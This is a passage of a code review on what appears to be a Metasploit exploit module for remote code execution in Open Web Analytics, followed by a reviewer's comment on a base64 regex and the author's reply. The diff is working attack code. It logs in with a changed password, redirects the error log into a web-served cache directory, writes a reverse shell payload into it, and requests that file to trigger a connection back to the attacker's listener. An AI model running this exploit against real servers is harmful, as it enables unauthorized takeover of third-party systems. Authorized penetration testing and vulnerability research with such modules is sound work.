modules/exploits/multi/http/open_web_analytics_rce.rb

```diff
@@ -0,0 +1,295 @@
+      'vars_post' => {
+        'owa_user_id' => username,
+        'owa_password' => new_password,
+        'owa_action' => 'base.login'
+      }
+    )
+
+    redirect = res['location']
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => URI(redirect).path
+    )
+    if res && res.code == 200
+      print_good("Logged in as #{username} user")
+    else
+      fail_with(Failure::Unknown, "An error occurred during the login attempt of user #{username}")
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')
+    )
+
+    nonce = get_update_nonce(res)
+    log_location = '/var/www/html/owa-data/caches/' + shell_filename
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_nonce' => nonce,
+        'owa_action' => 'base.optionsUpdate',
+        'owa_config[base.error_log_file]' => log_location,
+        'owa_config[base.error_log_level]' => 2
+      }
+    )
+    if !res
+      fail_with(Failure::Unknown, 'An error occurred when attempting to update config!')
+    else
+      print_status('Creating log file')
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_nonce' => nonce,
+        'owa_action' => 'base.optionsUpdate',
+        'owa_config[shell]' => reverse_shell
+      }
+    )
+    if !res
+      fail_with(Failure::Unknown, 'An error occurred when attempting to update config!')
+    else
+      print_good('Wrote payload to file')
+    end
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}")
+    )
+
+    print_good('Triggering payload! Check your listener!')
+    print_status("You can trigger the payload again at '#{shell_url}")
+  end
+
+  def etablish_connection
+    url = get_normalized_url(datastore['RHOSTS'])
+    base_url = url
+    res = nil
+    loop do
+      res = Net::HTTP.get_response(URI.parse(url))
+      url = res['location']
+      break unless res.is_a?(Net::HTTPRedirection)
+    end
+    if !res
+      fail_with(Failure::Unknown, "Could not connect to #{base_url}")
+    else
+      res
+    end
+  end
+
+  def get_normalized_url(url)
+    url += ":#{datastore['RPORT']}/"
+    if datastore['SSL']
+      url = "https://#{url}"
+    else
+      url = "http://#{url}"
+    end
+    url
+  end
+
+  def get_proxy_protocol(url)
+    url.start_with?('https://') ? 'https' : 'http'
+  end
+
+  def get_random_string(length)
+    chars = ('a'..'z').to_a + ('A'..'Z').to_a + (0..9).to_a
+    length.times.map { chars.sample }.join
+  end
+
+  def get_cache_content(cache_raw)
+    regex_cache_base64 = /\*(\w*)/
```

Comment:
If the `=` are included in this string, they're not getting matched by the `\w`. You could change that so they are included, removing the need to calculate and add them yourself on L273-L274 by changing the regex to:

```
/\*(\w*={0,2})/
```

The `\w` should also be updated to include the additional characters that base64 can include in the encoding such as `+` and `/` depending on the character set/flavor.

Reply:
Great catch! I updated the regex to your suggestion.